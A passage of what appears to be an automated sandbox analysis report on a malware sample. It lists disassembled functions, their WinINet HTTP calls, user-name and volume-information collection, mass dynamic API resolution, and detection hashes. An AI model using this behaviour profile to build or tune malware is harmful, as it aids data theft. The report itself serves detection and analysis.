                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • InternetOpenA.WININET(007D0DFF,00000001,00000000,00000000,00000000), ref: 007B6331
                                        • StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B6353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B63D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007B644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007B64BD
                                        • InternetCloseHandle.WININET(00000000), ref: 007B653F
                                        • InternetCloseHandle.WININET(00000000), ref: 007B6549
                                        • InternetCloseHandle.WININET(00000000), ref: 007B6553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 73cce85ff81b7f5af15abcb6d07f50ec68589e627b1db6a90a763f385421f221
                                        • Instruction ID: a2f118f56a7f6230758cdb950fe404811b79abaf53bf04e36511d8fbe89ae7fc
                                        • Opcode Fuzzy Hash: 73cce85ff81b7f5af15abcb6d07f50ec68589e627b1db6a90a763f385421f221
                                        • Instruction Fuzzy Hash: B6713CB1A00218EBDB24DF90DC59FEE7779AB44704F108199F60A6B194DBB86E84CF51
                                        Function 007C7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 7c7690-7c76da GetWindowsDirectoryA 1357 7c76dc 1356->1357 1358 7c76e3-7c7757 GetVolumeInformationA call 7c8e90 * 3 1356->1358 1357->1358 1365 7c7768-7c776f 1358->1365 1366 7c778c-7c77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 7c7771-7c778a call 7c8e90 1365->1367 1368 7c77b8-7c77e8 wsprintfA call 7caa50 1366->1368 1369 7c77a9-7c77b6 call 7caa50 1366->1369 1367->1365 1377 7c780e-7c781e 1368->1377 1369->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007C76D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007C770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C779A
                                        • wsprintfA.USER32 ref: 007C77D0
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: c15b150966fa06d8a238acfc007c431af1908e8278474e69534839390f2ef1ee
                                        • Instruction ID: fd6ef2e818beeef548966184a516b535f645f953fd2af7fdf4c0b5c6dc0438e6
                                        • Opcode Fuzzy Hash: c15b150966fa06d8a238acfc007c431af1908e8278474e69534839390f2ef1ee
                                        • Instruction Fuzzy Hash: 294173B1D04248EBDB14DB94DC85FDEBBB8AB48704F10419DF609A7280DB79AA44CFA5
                                        Function 007C79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007B11B7), ref: 007C7A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 007C7A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: b1e9634034387b0ee40efa2053257a24feb691877a2d10cebfabe35922800ba8
                                        • Instruction ID: e57ca653957c1d48f35e59bf2accebb8d5658b556034c82670bd107da2f1b720
                                        • Opcode Fuzzy Hash: b1e9634034387b0ee40efa2053257a24feb691877a2d10cebfabe35922800ba8
                                        • Instruction Fuzzy Hash: 9DF0AFB1908209EBC700CFC8DC45FAEBBB8EB08711F10021AF605A2680C7745900CBA0
                                        Function 007B1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 23f5136a47a93c3b25e4dd6a2e89db4ab3fdc22bcc0880c4040701b130c03cd3
                                        • Instruction ID: a34b550e550b240f1940a2b200ef7a909f2dde9a01bca94691c559a4c0aa3c50
                                        • Opcode Fuzzy Hash: 23f5136a47a93c3b25e4dd6a2e89db4ab3fdc22bcc0880c4040701b130c03cd3
                                        • Instruction Fuzzy Hash: 63D05E7490430C9BCB00DFE0988DADDBB78FB08615F500654D90572650EA309452CB65
                                        Function 007C9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 7c9f20-7c9f2a 634 7ca346-7ca3da LoadLibraryA * 8 633->634 635 7c9f30-7ca341 GetProcAddress * 43 633->635 636 7ca3dc-7ca451 GetProcAddress * 5 634->636 637 7ca456-7ca45d 634->637 635->634 636->637 638 7ca526-7ca52d 637->638 639 7ca463-7ca521 GetProcAddress * 8 637->639 640 7ca52f-7ca5a3 GetProcAddress * 5 638->640 641 7ca5a8-7ca5af 638->641 639->638 640->641 642 7ca5b5-7ca642 GetProcAddress * 6 641->642 643 7ca647-7ca64e 641->643 642->643 644 7ca72f-7ca736 643->644 645 7ca654-7ca72a GetProcAddress * 9 643->645 646 7ca738-7ca7ad GetProcAddress * 5 644->646 647 7ca7b2-7ca7b9 644->647 645->644 646->647 648 7ca7ec-7ca7f3 647->648 649 7ca7bb-7ca7e7 GetProcAddress * 2 647->649 650 7ca825-7ca82c 648->650 651 7ca7f5-7ca820 GetProcAddress * 2 648->651 649->648 652 7ca922-7ca929 650->652 653 7ca832-7ca91d GetProcAddress * 10 650->653 651->650 654 7ca98d-7ca994 652->654 655 7ca92b-7ca988 GetProcAddress * 4 652->655 653->652 656 7ca9ae-7ca9b5 654->656 657 7ca996-7ca9a9 GetProcAddress 654->657 655->654 658 7caa18-7caa19 656->658 659 7ca9b7-7caa13 GetProcAddress * 4 656->659 657->656 659->658
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,016452C8), ref: 007C9F3D
                                        • GetProcAddress.KERNEL32(77190000,01644FC8), ref: 007C9F55
                                        • GetProcAddress.KERNEL32(77190000,01659020), ref: 007C9F6E
                                        • GetProcAddress.KERNEL32(77190000,01659038), ref: 007C9F86
                                        • GetProcAddress.KERNEL32(77190000,01659050), ref: 007C9F9E
                                        • GetProcAddress.KERNEL32(77190000,0165D380), ref: 007C9FB7
                                        • GetProcAddress.KERNEL32(77190000,0164A500), ref: 007C9FCF
                                        • GetProcAddress.KERNEL32(77190000,0165D560), ref: 007C9FE7
                                        • GetProcAddress.KERNEL32(77190000,0165D5F0), ref: 007CA000
                                        • GetProcAddress.KERNEL32(77190000,0165D4A0), ref: 007CA018
                                        • GetProcAddress.KERNEL32(77190000,0165D398), ref: 007CA030
                                        • GetProcAddress.KERNEL32(77190000,016452E8), ref: 007CA049
                                        • GetProcAddress.KERNEL32(77190000,01645308), ref: 007CA061
                                        • GetProcAddress.KERNEL32(77190000,016451A8), ref: 007CA079
                                        • GetProcAddress.KERNEL32(77190000,01645048), ref: 007CA092
                                        • GetProcAddress.KERNEL32(77190000,0165D4D0), ref: 007CA0AA
                                        • GetProcAddress.KERNEL32(77190000,0165D3B0), ref: 007CA0C2
                                        • GetProcAddress.KERNEL32(77190000,0164A528), ref: 007CA0DB
                                        • GetProcAddress.KERNEL32(77190000,016450A8), ref: 007CA0F3
                                        • GetProcAddress.KERNEL32(77190000,0165D620), ref: 007CA10B
                                        • GetProcAddress.KERNEL32(77190000,0165D3C8), ref: 007CA124
                                        • GetProcAddress.KERNEL32(77190000,0165D5D8), ref: 007CA13C
                                        • GetProcAddress.KERNEL32(77190000,0165D3E0), ref: 007CA154
                                        • GetProcAddress.KERNEL32(77190000,01645068), ref: 007CA16D
                                        • GetProcAddress.KERNEL32(77190000,0165D578), ref: 007CA185
                                        • GetProcAddress.KERNEL32(77190000,0165D3F8), ref: 007CA19D
                                        • GetProcAddress.KERNEL32(77190000,0165D608), ref: 007CA1B6
                                        • GetProcAddress.KERNEL32(77190000,0165D518), ref: 007CA1CE
                                        • GetProcAddress.KERNEL32(77190000,0165D410), ref: 007CA1E6
                                        • GetProcAddress.KERNEL32(77190000,0165D500), ref: 007CA1FF
                                        • GetProcAddress.KERNEL32(77190000,0165D428), ref: 007CA217
                                        • GetProcAddress.KERNEL32(77190000,0165D590), ref: 007CA22F
                                        • GetProcAddress.KERNEL32(77190000,0165D440), ref: 007CA248
                                        • GetProcAddress.KERNEL32(77190000,0164FBF8), ref: 007CA260
                                        • GetProcAddress.KERNEL32(77190000,0165D338), ref: 007CA278
                                        • GetProcAddress.KERNEL32(77190000,0165D350), ref: 007CA291
                                        • GetProcAddress.KERNEL32(77190000,016451C8), ref: 007CA2A9
                                        • GetProcAddress.KERNEL32(77190000,0165D368), ref: 007CA2C1
                                        • GetProcAddress.KERNEL32(77190000,01645348), ref: 007CA2DA
                                        • GetProcAddress.KERNEL32(77190000,0165D4E8), ref: 007CA2F2
                                        • GetProcAddress.KERNEL32(77190000,0165D530), ref: 007CA30A
                                        • GetProcAddress.KERNEL32(77190000,01645368), ref: 007CA323
                                        • GetProcAddress.KERNEL32(77190000,01644F88), ref: 007CA33B
                                        • LoadLibraryA.KERNEL32(0165D548,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA34D
                                        • LoadLibraryA.KERNEL32(0165D488,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA35E
                                        • LoadLibraryA.KERNEL32(0165D5A8,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA370
                                        • LoadLibraryA.KERNEL32(0165D5C0,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA382
                                        • LoadLibraryA.KERNEL32(0165D458,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA393
                                        • LoadLibraryA.KERNEL32(0165D470,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA3A5
                                        • LoadLibraryA.KERNEL32(0165D4B8,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA3B7
                                        • LoadLibraryA.KERNEL32(0165D680,?,007C5EF3,007D0AEB,?,?,?,?,?,?,?,?,?,?,007D0AEA,007D0AE7), ref: 007CA3C8
                                        • GetProcAddress.KERNEL32(77040000,01644FA8), ref: 007CA3EA
                                        • GetProcAddress.KERNEL32(77040000,0165D668), ref: 007CA402
                                        • GetProcAddress.KERNEL32(77040000,01658C68), ref: 007CA41A
                                        • GetProcAddress.KERNEL32(77040000,0165D638), ref: 007CA433
                                        • GetProcAddress.KERNEL32(77040000,016450C8), ref: 007CA44B
                                        • GetProcAddress.KERNEL32(704D0000,0164A618), ref: 007CA470
                                        • GetProcAddress.KERNEL32(704D0000,016455A8), ref: 007CA489
                                        • GetProcAddress.KERNEL32(704D0000,0164A690), ref: 007CA4A1
                                        • GetProcAddress.KERNEL32(704D0000,0165D728), ref: 007CA4B9
                                        • GetProcAddress.KERNEL32(704D0000,0165D7E8), ref: 007CA4D2
                                        • GetProcAddress.KERNEL32(704D0000,01645488), ref: 007CA4EA
                                        • GetProcAddress.KERNEL32(704D0000,016454A8), ref: 007CA502
                                        • GetProcAddress.KERNEL32(704D0000,0165D698), ref: 007CA51B
                                        • GetProcAddress.KERNEL32(768D0000,01645548), ref: 007CA53C
                                        • GetProcAddress.KERNEL32(768D0000,01645568), ref: 007CA554
                                        • GetProcAddress.KERNEL32(768D0000,0165D6B0), ref: 007CA56D
                                        • GetProcAddress.KERNEL32(768D0000,0165D6F8), ref: 007CA585
                                        • GetProcAddress.KERNEL32(768D0000,01645668), ref: 007CA59D
                                        • GetProcAddress.KERNEL32(75790000,0164A910), ref: 007CA5C3
                                        • GetProcAddress.KERNEL32(75790000,0164A5F0), ref: 007CA5DB
                                        • GetProcAddress.KERNEL32(75790000,0165D6C8), ref: 007CA5F3
                                        • GetProcAddress.KERNEL32(75790000,01645648), ref: 007CA60C
                                        • GetProcAddress.KERNEL32(75790000,016455C8), ref: 007CA624
                                        • GetProcAddress.KERNEL32(75790000,0164A7D0), ref: 007CA63C
                                        • GetProcAddress.KERNEL32(75A10000,0165D710), ref: 007CA662
                                        • GetProcAddress.KERNEL32(75A10000,01645688), ref: 007CA67A
                                        • GetProcAddress.KERNEL32(75A10000,01658B18), ref: 007CA692
                                        • GetProcAddress.KERNEL32(75A10000,0165D7D0), ref: 007CA6AB
                                        • GetProcAddress.KERNEL32(75A10000,0165D650), ref: 007CA6C3
                                        • GetProcAddress.KERNEL32(75A10000,01645528), ref: 007CA6DB
                                        • GetProcAddress.KERNEL32(75A10000,01645508), ref: 007CA6F4
                                        • GetProcAddress.KERNEL32(75A10000,0165D6E0), ref: 007CA70C
                                        • GetProcAddress.KERNEL32(75A10000,0165D740), ref: 007CA724
                                        • GetProcAddress.KERNEL32(76850000,01645588), ref: 007CA746
                                        • GetProcAddress.KERNEL32(76850000,0165D758), ref: 007CA75E
                                        • GetProcAddress.KERNEL32(76850000,0165D770), ref: 007CA776
                                        • GetProcAddress.KERNEL32(76850000,0165D788), ref: 007CA78F
                                        • GetProcAddress.KERNEL32(76850000,0165D7A0), ref: 007CA7A7
                                        • GetProcAddress.KERNEL32(75690000,01645408), ref: 007CA7C8
                                        • GetProcAddress.KERNEL32(75690000,016456E8), ref: 007CA7E1
                                        • GetProcAddress.KERNEL32(769C0000,016454C8), ref: 007CA802
                                        • GetProcAddress.KERNEL32(769C0000,0165D7B8), ref: 007CA81A
                                        • GetProcAddress.KERNEL32(6F8C0000,01645428), ref: 007CA840
                                        • GetProcAddress.KERNEL32(6F8C0000,016456A8), ref: 007CA858
                                        • GetProcAddress.KERNEL32(6F8C0000,016455E8), ref: 007CA870
                                        • GetProcAddress.KERNEL32(6F8C0000,0165D2A8), ref: 007CA889
                                        • GetProcAddress.KERNEL32(6F8C0000,01645708), ref: 007CA8A1
                                        • GetProcAddress.KERNEL32(6F8C0000,01645388), ref: 007CA8B9
                                        • GetProcAddress.KERNEL32(6F8C0000,01645448), ref: 007CA8D2
                                        • GetProcAddress.KERNEL32(6F8C0000,01645468), ref: 007CA8EA
                                        • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 007CA901
                                        • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 007CA917
                                        • GetProcAddress.KERNEL32(75D90000,0165D0E0), ref: 007CA939
                                        • GetProcAddress.KERNEL32(75D90000,01658C28), ref: 007CA951
                                        • GetProcAddress.KERNEL32(75D90000,0165D230), ref: 007CA969
                                        • GetProcAddress.KERNEL32(75D90000,0165D1D0), ref: 007CA982
                                        • GetProcAddress.KERNEL32(76470000,016454E8), ref: 007CA9A3
                                        • GetProcAddress.KERNEL32(70220000,0165D2D8), ref: 007CA9C4
                                        • GetProcAddress.KERNEL32(70220000,01645728), ref: 007CA9DD
                                        • GetProcAddress.KERNEL32(70220000,0165D248), ref: 007CA9F5
                                        • GetProcAddress.KERNEL32(70220000,0165D068), ref: 007CAA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: fd42cc634e57cddb6baf1491209389bccb00b56da104c07621ddb70727f35e8d
                                        • Instruction ID: 900feb3fb8e7c28204e6d2f079054b0d924b7149e5ee95d2646e1dc5365a4d0c
                                        • Opcode Fuzzy Hash: fd42cc634e57cddb6baf1491209389bccb00b56da104c07621ddb70727f35e8d
                                        • Instruction Fuzzy Hash: A562FDB6618200DFD345EFE8ED8CA5A7BB9B74D701760861ABA09C3670E735D943CB60
                                        Function 007B48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 801 7b48d0-7b4992 call 7caab0 call 7b4800 call 7caa50 * 5 InternetOpenA StrCmpCA 816 7b499b-7b499f 801->816 817 7b4994 801->817 818 7b4f1b-7b4f43 InternetCloseHandle call 7cade0 call 7ba210 816->818 819 7b49a5-7b4b1d call 7c8cf0 call 7cac30 call 7cabb0 call 7cab10 * 2 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cac30 call 7cabb0 call 7cab10 * 2 InternetConnectA 816->819 817->816 828 7b4f82-7b4ff2 call 7c8b20 * 2 call 7caab0 call 7cab10 * 8 818->828 829 7b4f45-7b4f7d call 7cab30 call 7cacc0 call 7cabb0 call 7cab10 818->829 819->818 905 7b4b23-7b4b27 819->905 829->828 906 7b4b29-7b4b33 905->906 907 7b4b35 905->907 908 7b4b3f-7b4b72 HttpOpenRequestA 906->908 907->908 909 7b4b78-7b4e78 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cacc0 call 7cabb0 call 7cab10 call 7cac30 call 7cabb0 call 7cab10 call 7caa50 call 7cac30 * 2 call 7cabb0 call 7cab10 * 2 call 7cade0 lstrlen call 7cade0 * 2 lstrlen call 7cade0 HttpSendRequestA 908->909 910 7b4f0e-7b4f15 InternetCloseHandle 908->910 1021 7b4e82-7b4eac InternetReadFile 909->1021 910->818 1022 7b4eae-7b4eb5 1021->1022 1023 7b4eb7-7b4f09 InternetCloseHandle call 7cab10 1021->1023 1022->1023 1024 7b4eb9-7b4ef7 call 7cacc0 call 7cabb0 call 7cab10 1022->1024 1023->910 1024->1021
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                          • Part of subcall function 007B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007B4965
                                        • StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B4B0A
